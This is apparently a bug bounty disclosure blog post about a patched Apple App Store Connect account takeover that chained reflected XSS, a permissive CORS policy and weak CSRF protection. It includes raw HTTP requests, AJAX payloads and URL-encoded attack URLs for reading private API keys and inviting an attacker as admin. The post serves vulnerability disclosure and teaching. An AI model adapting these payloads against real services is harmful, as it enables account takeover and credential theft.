Account Takeover Apple App Store Connect Account of Any user and Steal Developer API/Subscription Keys of any user(CORS+XSS) worth 8500$

-
Company Information : 


Apple Inc. is an American multinational technology company headquartered in Cupertino, California. As of March 2023, Apple is the world's biggest company by market capitalization, and with US$394.3 billion the largest technology company by 2022 revenue.



Bug Category : 
Cross-origin resource sharing (CORS) :
Cross-origin resource sharing (CORS) is a mechanism that allows restricted resources on a web page to be accessed from another domain outside the domain from which the first resource was served. A web page may freely embed cross-origin images, stylesheets, scripts, iframes, and videos.


Stored Cross-site-scripting (XSS) :
Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it.

Impact :
1.Stealing  App Store connect API key with Full Access , Subscription Keys , shared secret etc.
2.Site wide CSRF on https://appstoreconnect.apple.com
3.Access to any details of App store connect account of any user. 
4.Complete Access to App Store connect Account of any Developer user.



Technical Details of the Bug : 
1.XSS in http://ax.itunes.apple.com

POC :
http://ax.itunes.apple.com/essentials?id="><script>alert(document.domain)</script>
http://ax.itunes.apple.com/essentials?id="><script>alert(document.cookie)</script>

Screenshot : 




2.CORS Bypass in App Store Connect :
CORS is implemented in App Store connect All the requests. 
CORS is configured For All subdomains of *.itunes.apple.com
Hence Any user can Read and Write data on https://appstoreconnect.apple.com through any subdomain of itunes.apple.com  .

Screenshot : 


3.Week CSRF protection in App Store Connect :
There is no Proper CSRF protection in App Store connect. Only protection is Origin Validation and Content-Type Validation.


Chaining all Three Attacks : 
http://ax.itunes.apple.com domain is valid for CORS in https://appstoreconnect.apple.com. 

Hence XSS in http://ax.itunes.apple.com could lead to READ/write data on https://appstoreconnect.apple.com through CORS.




##Steps to reproduce and POCs :
How to capture below mentioned requests :
1.Login to App Store connect account.
2.Go to Accounts -- > people, keys etc.
3.Check The background requests through proxy tool like Burp suite. 
4.You will get all the below mentioned requests. 
I am going to mention few requests , AJAX Code for Attack and Direct POC URLs below 
1.Access to user details :

Vulnerable HTTP Request :
```
GET /iris/v1/users?include=visibleApps,provider&limit=1000&sort=lastName&limit[visibleApps]=2000&fields[apps]= HTTP/1.1
Host: appstoreconnect.apple.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: application/vnd.api+json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://appstoreconnect.apple.com/access/users
content-type: application/vnd.api+json
x-csrf-itc: [asc-ui]
Connection: close
Cookie: [cookies]
```
AJAX Request :
<script>
       var xhttp = new XMLHttpRequest();
       xhttp.onreadystatechange = function() {
         if (this.readyState == 4 && this.status == 200) {
alert(this.responseText);
         }
       };
       xhttp.open("GET", "https://appstoreconnect.apple.com/iris/v1/users?include=visibleApps,provider&limit=1000&sort=lastName&limit[visibleApps]=2000&fields[apps]=", true);
       xhttp.withCredentials = true;
       xhttp.send();
   </script>

URL Encoded Attack URL :
http://ax.itunes.apple.com/essentials?id=">%3Cscript%3E%0A%20%20%20%20%20%20%C2%A0var%20xhttp%20%3D%20new%20XMLHttpRequest()%3B%0A%20%20%20%20%20%20%C2%A0xhttp.onreadystatechange%20%3D%20function()%20%7B%0A%20%20%20%20%20%20%C2%A0%C2%A0%C2%A0if%20(this.readyState%20%3D%3D%204%20%26%26%20this.status%20%3D%3D%20200)%20%7B%0Aalert(this.responseText)%3B%0A%20%20%20%20%20%20%C2%A0%C2%A0%C2%A0%7D%0A%20%20%20%20%20%20%C2%A0%7D%3B%0A%20%20%20%20%20%20%C2%A0xhttp.open(%22GET%22%2C%20%22https%3A%2F%2Fappstoreconnect.apple.com%2Firis%2Fv1%2Fusers%3Finclude%3DvisibleApps%2Cprovider%26limit%3D1000%26sort%3DlastName%26limit%5BvisibleApps%5D%3D2000%26fields%5Bapps%5D%3D%22%2C%20true)%3B%0A%20%20%20%20%20%20%C2%A0xhttp.withCredentials%20%3D%20true%3B%0A%20%20%20%20%20%20%C2%A0xhttp.send()%3B%0A%20%20%20%3C%2Fscript%3E
2.Access to API Private Keys :
Vulnerable HTTP Request :
```
GET /iris/v1/apiAccesses?include=requestedBy HTTP/1.1
Host: appstoreconnect.apple.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: application/vnd.api+json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://appstoreconnect.apple.com/access/api
content-type: application/vnd.api+json
x-csrf-itc: [asc-ui]
Connection: close
Cookie: cookies
```
AJAX Request :
<script>
       var xhttp = new XMLHttpRequest();
       xhttp.onreadystatechange = function() {
         if (this.readyState == 4 && this.status == 200) {
alert(this.responseText);
         }
       };
       xhttp.open("GET", "https://appstoreconnect.apple.com/iris/v1/apiKeys?include=createdBy,revokedBy,provider&sort=-isActive,-revokingDate&limit=500", true);
       xhttp.withCredentials = true;
       xhttp.send();
   </script>
URL Encoded Attack URL :
http://ax.itunes.apple.com/essentials?id=">%3Cscript%3E%0A%20%20%20%20%20%20%C2%A0var%20xhttp%20%3D%20new%20XMLHttpRequest()%3B%0A%20%20%20%20%20%20%C2%A0xhttp.onreadystatechange%20%3D%20function()%20%7B%0A%20%20%20%20%20%20%C2%A0%C2%A0%C2%A0if%20(this.readyState%20%3D%3D%204%20%26%26%20this.status%20%3D%3D%20200)%20%7B%0Aalert(this.responseText)%3B%0A%20%20%20%20%20%20%C2%A0%C2%A0%C2%A0%7D%0A%20%20%20%20%20%20%C2%A0%7D%3B%0A%20%20%20%20%20%20%C2%A0xhttp.open(%22GET%22%2C%20%22https%3A%2F%2Fappstoreconnect.apple.com%2Firis%2Fv1%2FapiKeys%3Finclude%3DcreatedBy%2CrevokedBy%2Cprovider%26sort%3D-isActive%2C-revokingDate%26limit%3D500%22%2C%20true)%3B%0A%20%20%20%20%20%20%C2%A0xhttp.withCredentials%20%3D%20true%3B%0A%20%20%20%20%20%20%C2%A0xhttp.send()%3B%0A%20%20%20%3C%2Fscript%3E
Vulnerable HTTP Request :
```
GET /iris/v1/apiKeys/ZM249W4T3V?fields[apiKeys]=privateKey HTTP/1.1
Host: appstoreconnect.apple.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: application/vnd.api+json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://appstoreconnect.apple.com/access/api
content-type: application/vnd.api+json
x-csrf-itc: [asc-ui]
Connection: close
Cookie: cookies
```
AJAX Request :
<script>
       var xhttp = new XMLHttpRequest();
       xhttp.onreadystatechange = function() {
         if (this.readyState == 4 && this.status == 200) {
alert(this.responseText);
         }
       };
       xhttp.open("GET", "https://appstoreconnect.apple.com/iris/v1/apiKeys/ZM249W4T3V?fields[apiKeys]=privateKey", true);
       xhttp.withCredentials = true;
       xhttp.send();
   </script>
URL Encoded Attack URL :
http://ax.itunes.apple.com/essentials?id=">%3Cscript%3E%0A%20%20%20%20%20%20%C2%A0var%20xhttp%20%3D%20new%20XMLHttpRequest()%3B%0A%20%20%20%20%20%20%C2%A0xhttp.onreadystatechange%20%3D%20function()%20%7B%0A%20%20%20%20%20%20%C2%A0%C2%A0%C2%A0if%20(this.readyState%20%3D%3D%204%20%26%26%20this.status%20%3D%3D%20200)%20%7B%0Aalert(this.responseText)%3B%0A%20%20%20%20%20%20%C2%A0%C2%A0%C2%A0%7D%0A%20%20%20%20%20%20%C2%A0%7D%3B%0A%20%20%20%20%20%20%C2%A0xhttp.open(%22GET%22%2C%20%22https%3A%2F%2Fappstoreconnect.apple.com%2Firis%2Fv1%2FapiKeys%2FZM249W4T3V%3Ffields%5BapiKeys%5D%3DprivateKey%22%2C%20true)%3B%0A%20%20%20%20%20%20%C2%A0xhttp.withCredentials%20%3D%20true%3B%0A%20%20%20%20%20%20%C2%A0xhttp.send()%3B%0A%20%20%20%3C%2Fscript%3E
3.Add Attacker as a Admin user of Account (CSRF Attack):
Vulnerable HTTP Request :
```
POST /iris/v1/userInvitations HTTP/1.1
Host: appstoreconnect.apple.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: application/vnd.api+json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/vnd.api+json
Content-Length: 192
x-csrf-itc: [asc-ui]
Origin: https://appstoreconnect.apple.com
Referer: https://appstoreconnect.apple.com/access/users
Connection: close
Cookie: [cookies]
{"data":{"type":"userInvitations","attributes":{"email":"attacker@gmail.com","firstName":"attacker","lastName":"attacker","roles":["ADMIN"],"provisioningAllowed":false,"allAppsVisible":true}}}
```
AJAX Request :
<script>
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
alert(this.responseText);
}
};
xhttp.open("POST", "https://appstoreconnect.apple.com/iris/v1/userInvitations", true);
xhttp.setRequestHeader("Content-Type", "application/vnd.api+json");
var data=JSON.stringify({"data":{"type":"userInvitations","attributes":{"email":"Attacker@gmail.com","firstName":"Attacker","lastName":"Attacker","roles":["ADMIN"],"provisioningAllowed":false,"allAppsVisible":true}}});
xhttp.withCredentials = true;
xhttp.send(data);
</script>
URL Encoded Attack URL :
http://ax.itunes.apple.com/essentials?id=">%3Cscript%3E%0Avar%20xhttp%20%3D%20new%20XMLHttpRequest()%3B%0Axhttp.onreadystatechange%20%3D%20function()%20%7B%0Aif%20(this.readyState%20%3D%3D%204%20%26%26%20this.status%20%3D%3D%20200)%20%7B%0Aalert(this.responseText)%3B%0A%7D%0A%7D%3B%0Axhttp.open(%22POST%22%2C%20%22https%3A%2F%2Fappstoreconnect.apple.com%2Firis%2Fv1%2FuserInvitations%22%2C%20true)%3B%0Axhttp.setRequestHeader(%22Content-Type%22%2C%20%22application%2Fvnd.api%2Bjson%22)%3B%0Avar%20data%3DJSON.stringify(%7B%22data%22%3A%7B%22type%22%3A%22userInvitations%22%2C%22attributes%22%3A%7B%22email%22%3A%22Attacker%40gmail.com%22%2C%22firstName%22%3A%22Attacker%22%2C%22lastName%22%3A%22Attacker%22%2C%22roles%22%3A%5B%22ADMIN%22%5D%2C%22provisioningAllowed%22%3Afalse%2C%22allAppsVisible%22%3Atrue%7D%7D%7D)%3B%0Axhttp.withCredentials%20%3D%20true%3B%0Axhttp.send(data)%3B%0A%3C%2Fscript%3E%0A

#Video Proof of concept :
I am attaching a password protected video from my Vimeo Account.
Link : https://vimeo.com/559575046
Password : h1test1110@


Timeline : 

June 07th 2021: Report send to Apple product Security Team through Email.
June 07th 2021 : Report Accepted and Triaged.
June 08th 2021 : Partial Fix was released by Fixing the XSS part.
July 21th 2021 : Complete issue was resolved and confirmed.
August 31th 2021 : 8500$ Bounty Rewarded


Comments

Post a Comment

Popular posts from this blog

Amazon Web Services : Takeover Workbook and delete the Owner on https://builder.honeycode.aws by collaborator user (IDOR) worth 7200$

-
Image
  Company Information :  Amazon Web Services, Inc. is a subsidiary of Amazon that provides on-demand cloud computing platforms and APIs to individuals, companies, and governments, on a metered, pay-as-you-go basis. Clients will often use this in combination with autoscaling. Bug Category :  Insecure direct object reference(IDOR ) :  Insecure direct object reference is a type of access control vulnerability in digital security. This can occur when a web application or application programming interface uses an identifier for direct access to an object in an internal database but does not check for access control or authentication. Target  Information :  https://builder.honeycode.aws/ Technical Details of the Bug :  On https://builder.honeycode.aws you can add workbook and add users as collaborator. collaborator have limited access to the functionalities and sharing part. But there is a way which can lead to collaborator to demote the owner , remove him ...
Read more

UnAuth Access to Twitter Private Tweets and messages Media Content Access(IDOR)

-
Image
Company Info : Twitter is an online news and social networking service where users post and interact with messages, "tweets", restricted to 140 characters. Registered users can post tweets, but those who are unregistered can only read them. Users access Twitter through its website interface, SMS or a mobile device app.Twitter Inc. is based in San Francisco, California, United States, and has more than 25 offices around the world. Bug category : Indirect Object Reference(IDOR) Link : https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References Technical Details of the Bug :  Applications frequently use the actual name or key of an object when generating web pages. Applications don’t always verify the user is authorized for the target object. This results in an insecure direct object reference flaw. Testers can easily manipulate parameter values to detect such flaws. Code analysis quickly shows whether authorization is properly verified. Bug Des...
Read more